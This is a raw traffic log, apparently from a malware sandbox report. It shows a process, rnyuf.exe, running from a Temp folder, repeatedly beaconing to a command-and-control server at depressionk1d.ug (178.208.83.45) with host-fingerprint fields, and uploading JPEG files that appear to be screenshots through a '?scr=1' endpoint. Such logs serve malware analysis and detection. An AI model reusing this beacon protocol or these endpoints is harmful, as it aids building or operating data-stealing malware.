                          Nov 12, 2021 22:23:51.330199003 CET7476INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:51.377135038 CET7476OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.402901888 CET7477INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          151192.168.2.449936178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.060720921 CET7379OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.086910009 CET7405INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          152192.168.2.449937178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.238609076 CET7475OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.263679981 CET7476INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          153192.168.2.449938178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.541973114 CET7478OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.568938017 CET7478INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          154192.168.2.449939178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.706532955 CET7479OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.739728928 CET7479INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          155192.168.2.449940178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:51.739830017 CET7479OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----86276d229fb4ffc8fb814ec5a99a260f
                          Host: depressionk1d.ug
                          Content-Length: 106881
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:51.740015030 CET7480OUTData Raw: 2d 2d 2d 2d 2d 2d 38 36 32 37 36 64 32 32 39 66 62 34 66 66 63 38 66 62 38 31 34 65 63 35 61 39 39 61 32 36 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------86276d229fb4ffc8fb814ec5a99a260fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:51.740359068 CET7490OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:51.740675926 CET7492OUTData Raw: 0b 95 68 ad 24 d1 2e 9b ef 18 d3 ea 73 fc aa b5 ed a1 b2 99 63 2e 18 95 dd 90 31 dc ff 00 85 53 84 92 bb 40 9a 2b 51 45 1d aa 46 14 51 45 02 0a 28 a2 80 0a 29 68 a0 04 a5 a2 8a 00 28 a2 90 d0 02 d1 45 14 00 52 d0 29 e9 14 92 1c 47 1b 3f fb a3 34
                          Data Ascii: h$.sc.1S@+QEFQE()h(ER)G?4w&{'H@ue4+~&d9u2&HW>DPQKE%PRPQKGzJ)h Z,QKJ1Z1A1K@1K1L.6Z1Hb@1@E-RF()hfpRS8!
                          Nov 12, 2021 22:23:51.768513918 CET7496OUTData Raw: bd 47 c2 fe 01 d5 b4 5f 11 da 6a 37 57 16 6f 14 3b f7 08 dd cb 72 85 46 32 a3 d4 77 af 2e f8 db ff 00 25 1e 6f fa f6 8b f9 57 91 8a 74 9e 21 3a 4e ea df 8d d9 ec 61 15 58 d0 6a aa b3 bf e1 64 79 cd 2d 1c d1 cd 49 a0 94 51 45 00 7a 4f c1 4f f9 1d
                          Data Ascii: G_j7Wo;rF2w.%oWt!:NaXjdy-IQEzOO\~ A<\H+><Ew=5kg=k*^UHTuTtvs <?iV9odc$c'qn</4R4G9bv\QD$fghn
                          Nov 12, 2021 22:23:51.768609047 CET7515OUTData Raw: 68 aa 6d bb dd bf eb fc cc 31 58 bf 6d 08 d3 8c 39 63 1b be af 57 6b fe 48 6d 1c d2 52 d7 41 c4 1c d1 45 14 c0 28 a2 8a 00 29 29 69 29 00 51 45 14 00 bd e8 e6 8a 39 a6 01 49 4b cd 25 00 28 a5 a4 14 50 03 b3 49 49 40 a0 43 bb d1 45 14 00 56 a7 86
                          Data Ascii: hm1Xm9cWkHmRAE())i)QE9IK%(PII@CEV<U~CjX55I0 7oM/f:q$ v|]%1;vI'It{o\y suq;|\gQ4)FMY-u`
                          Nov 12, 2021 22:23:51.768641949 CET7518OUTData Raw: ab 66 2f 6a 69 8f da 8e 52 bd a1 50 a5 1b 6a d1 8e 90 a5 2e 51 f3 95 76 d2 ed a9 f6 d2 14 a2 c3 e7 21 0b 4b 8a 93 6d 2e 28 b0 73 0c 02 9c 05 2e 29 71 4c 9b 88 05 2e 29 c0 52 e2 98 ae 37 14 01 8a 76 28 c5 16 15 c4 c7 d2 9a 63 53 fc 22 9f 8a 5c 51
                          Data Ascii: f/jiRPj.Qv!Km.(s.)qL.)R7v(cS"\Qd>bn)eP{FNi^-.D?j>W4yjShR(h: JIwynCS2\SP+-(0R4O11LR#"qqM4\rC#7#
                          Nov 12, 2021 22:23:51.795983076 CET7529OUTData Raw: a0 e0 99 8f 9f 1c 60 8f dd 27 cb 87 3e bc e3 9f 55 97 4a d1 ce a9 79 e1 fb 76 be 6d 5a d2 29 73 74 5d 4c 12 4d 12 96 78 c4 61 77 01 f2 b2 86 de 79 00 e3 07 8e 7e 0b b9 2d e1 d5 55 21 25 b5 18 7c ac ef c7 95 fb e4 93 3d 39 fb 98 ed d7 35 ab 3f 88
                          Data Ascii: `'>UJyvmZ)st]LMxawy~-U!%|=95?[F=%\f^Dh!rb@74+jpH-o F@dTCP5{fX-LlVH>_$YIJ)RJ+C!EQ!(LS@-4ZwQE1E
                          Nov 12, 2021 22:23:51.796039104 CET7531OUTData Raw: 8c 77 77 76 b6 69 a7 ce 2d e7 9a 7d e5 43 96 60 00 0a ac c7 ee b1 e9 d0 1a 35 9d 19 34 66 81 0e ab 61 77 24 d1 a4 cb 1d b0 9b 22 37 50 ca c7 7c 6a 30 41 1c 67 3e d5 37 89 35 8b 4d 57 4b b0 8e d9 dd ee ee 08 ba d4 f7 21 00 4e b1 ac 40 02 7a e7 6b
                          Data Ascii: wwvi-}C`54faw$"7P|j0Ag>75MWK!N@zk>=jyolbGZitU#giIe*tmvC4u+oI"f8O@j3yr5)lLJnQE;~CL-QtSqKVeSJm9kz:]46&O
                          Nov 12, 2021 22:23:51.796789885 CET7542OUTData Raw: 19 a0 41 d6 94 7d 68 a5 02 80 17 b5 38 50 05 14 c9 62 d2 9a 6f 6a 05 02 b0 b4 a0 e2 92 8a 04 3c 11 4a 6a 3a 78 3c 50 26 8d 9f 0c 8c eb 31 fd 0d 57 bd ff 00 8f e9 ff 00 df 35 67 c2 a3 3a e4 7f ee 9a ad 7b ff 00 1f f7 03 fd b3 5c ab fd e1 fa 1a d4
                          Data Ascii: A}h8Pboj<Jj:x<P&1W5g:{\ 84IEE%EP!E8S)QEhN_)LZO*dZZO1WHJ/GS^k3K!Xuqaanp=}8H)sHhp4t
                          Nov 12, 2021 22:23:51.796869040 CET7545OUTData Raw: a5 a2 97 14 c9 62 d2 d2 52 67 9a 64 8a 69 45 25 28 a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75
                          Data Ascii: bRgdiE%(%(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcS
                          Nov 12, 2021 22:23:51.847037077 CET7589INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:51.849318027 CET7590OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:51.874819994 CET7590INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:51 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          156192.168.2.449941178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.012182951 CET7591OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.040024042 CET7591INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          157192.168.2.449942178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.169316053 CET7592OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.201010942 CET7592INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:52.261712074 CET7592OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----d156afa604c62121b8f472f457fa2c8f
                          Host: depressionk1d.ug
                          Content-Length: 106953
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:52.261745930 CET7593OUTData Raw: 2d 2d 2d 2d 2d 2d 64 31 35 36 61 66 61 36 30 34 63 36 32 31 32 31 62 38 66 34 37 32 66 34 35 37 66 61 32 63 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------d156afa604c62121b8f472f457fa2c8fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:52.262332916 CET7603OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:52.262480974 CET7605OUTData Raw: 70 35 71 92 92 ba 22 51 71 76 61 45 14 55 12 14 51 45 00 14 57 47 e0 bf 0d 1f 14 6b 91 d8 83 f7 88 18 27 03 b9 24 fb 00 09 af 5d ff 00 85 0f a6 63 9d 47 ff 00 20 37 ff 00 1c ae 59 e2 a3 19 38 a8 b7 6e d6 fd 5a 3d 0a 59 7b 9d 28 d4 9d 48 c5 4b 6b
                          Data Ascii: p5q"QqvaEUQEWGk'$]cG 7Y8nZ=Y{(HKk]EWUsgzMY3n/=xXK-ndeb>aFnEfJ*J)K;Ze8bR`3qm
                          Nov 12, 2021 22:23:52.285397053 CET7608OUTData Raw: fc 1b d1 91 82 9b dd b2 bf 98 3f 86 2b e8 c8 eb c2 fe 37 1f f8 ac ec ff 00 ec 1c 9f fa 32 4a f4 b2 59 b5 88 e5 5d 51 c9 8e 49 d3 b9 e6 b4 52 d2 75 af ac 3c 70 ef 49 4e a2 80 12 be 80 fd 9f 7f e4 5c d5 ff 00 eb ed 7f f4 0a f9 fe be 80 fd 9f bf e4
                          Data Ascii: ?+72JY]QIRu<pIN\]?kK9o3})keoI~|==7\4v7T`?\;?G*s~E{|>3r7zV{sev6'>JoQXz
                          Nov 12, 2021 22:23:52.285521030 CET7629OUTData Raw: cd cd 4a d7 3d 1a 78 e8 aa 51 a7 52 9f 37 2e 89 dd ad 1b 6e df 7b 67 d0 57 5f 13 bc 0b 7c d0 35 dd 92 dc 18 39 84 cb 14 0f e5 f4 fb b9 7e 3a 0e 9e 95 3c 5f 16 fc 21 03 4a d1 47 2c 6d 2b f9 92 14 58 86 f6 c0 19 3f 3f 27 00 0c fb 0a f9 d3 4f d2 35
                          Data Ascii: J=xQR7.n{gW_|59~:<_!JG,m+X??'O5=X46[@lLZdT%c{dG_P?3=?=SV[b '' WUY''nSK27YH##dc[Qv0b#N0n]
                          Nov 12, 2021 22:23:52.308078051 CET7661OUTData Raw: 51 e4 e3 23 71 03 2e 7a 77 ac e5 f1 ad d2 dc aa 8d 32 cb fb 30 59 fd 87 ec be 44 3e 69 87 cb d8 47 da 3c bf 33 24 92 d9 cf 53 59 cb ae b1 f1 16 91 ac 1b 32 0e 9a 96 89 e4 f9 bf eb 3c 85 51 d7 1c 6e db e8 71 9e f5 57 aa df cf f0 d7 fe 01 16 a4 a3
                          Data Ascii: Q#q.zw20YD>iG<3$SY2<QnqWoO%=;OXjEAvM{v.$%z,@2"Fc ZXkK}cHK}Fb\cP"l'Zn.$&Y.VP*TlzQJ,t
                          Nov 12, 2021 22:23:52.308162928 CET7672OUTData Raw: 00 39 e0 56 7d cd bc 4b e0 b8 b5 c3 a7 c5 1d dd da 47 65 22 98 d3 64 29 b8 81 72 17 b1 7f 2c a8 38 1c ab 9c f2 2a bd ba bd ad e5 f8 b5 fd 7a dc 4e 83 ee 72 94 57 47 af ea 47 47 d6 af b4 6b 5d 2f 4e 5b 1b 09 cc 48 26 b4 8d e5 93 63 7d f6 94 82 e4
                          Data Ascii: 9V}KGe"d)r,8*zNrWGGGk]/N[H&c}31nEi~#-KVV1"N;Oz)Et,xEs5eH4o?&3UH"jStf:Ss]n-\F|:D-&mxy!AeUEt
                          Nov 12, 2021 22:23:52.308278084 CET7677OUTData Raw: 1d a4 e0 15 00 63 93 9e 07 51 27 60 50 6d 5c c9 d3 f5 0b ad 2e fa 2b db 19 9a 1b 98 4e 63 91 40 ca 9c 63 23 35 d1 7f c2 cb f1 9f fd 0c 37 9f 98 ff 00 0a 7d cf 85 ec f4 bd 3f 50 92 74 be d4 a4 b6 b8 78 64 7b 09 11 45 a4 7b 55 a3 9a 54 2a c4 ab ee
                          Data Ascii: cQ'`Pm\.+Nc@c#57}?Ptxd{E{UT*P6=Glzl1J&X9M.R"?WItVVtwY[REW\y.U>AFFy<I<+mgw74mm7uHy\p;PI
                          Nov 12, 2021 22:23:52.330862045 CET7683OUTData Raw: d0 83 fa 0a f9 4b 9a fa db c7 ff 00 f2 24 ea 1f f6 cf ff 00 46 2d 7c 91 5d b8 5f e2 cf d1 7e a7 99 8c 6d e0 e9 5f a4 a7 f9 43 fc c5 a2 92 97 9a f4 0f 28 28 a3 9a 28 00 a0 51 45 02 16 90 d1 45 00 06 8a 3b 51 40 05 2d 25 14 00 e1 45 25 14 00 b4 50
                          Data Ascii: K$F-|]_~m_C(((QEE;Q@-%E%P(RP)pQLAKI@c%SQERRQE0Z)3E1zZJ(h-4R!4ZbRR-Q@8SE--4\--&h--6KJ3Mp4LTHf4dzPniV
                          Nov 12, 2021 22:23:52.330946922 CET7699OUTData Raw: 45 1a 87 82 46 55 dc e8 4e 71 bb 20 32 29 18 1c d7 21 81 e8 28 c0 f4 a7 ec 76 d7 fa d7 fc c3 db 34 f6 fe b4 ff 00 23 be 9f c7 30 cd e3 9d 56 e4 be 9f fd 93 3a dd ac 57 0b a5 44 b2 b0 78 5d 53 e7 11 f9 b9 2c 40 c9 39 e7 9e 33 5c 04 63 11 a8 f6 a7
                          Data Ascii: EFUNq 2)!(v4#0V:WDx]S,@93\c=)jPQX%V(IEJZ`-/4P!y(Z))y)i(CJ:LbLu`:4KIEiZ)(KMKIEJ3L\hKEZ)u(4
                          Nov 12, 2021 22:23:52.356133938 CET7700INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          158192.168.2.449943178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.341676950 CET7699OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.367495060 CET7700INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          159192.168.2.449944178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.502800941 CET7701OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.528734922 CET7701INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          16192.168.2.449797178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:18.338051081 CET2305OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----1354c0751e396efa7287aa5f42b89d56
                          Host: depressionk1d.ug
                          Content-Length: 106715
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:18.338172913 CET2305OUTData Raw: 2d 2d 2d 2d 2d 2d 31 33 35 34 63 30 37 35 31 65 33 39 36 65 66 61 37 32 38 37 61 61 35 66 34 32 62 38 39 64 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------1354c0751e396efa7287aa5f42b89d56Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
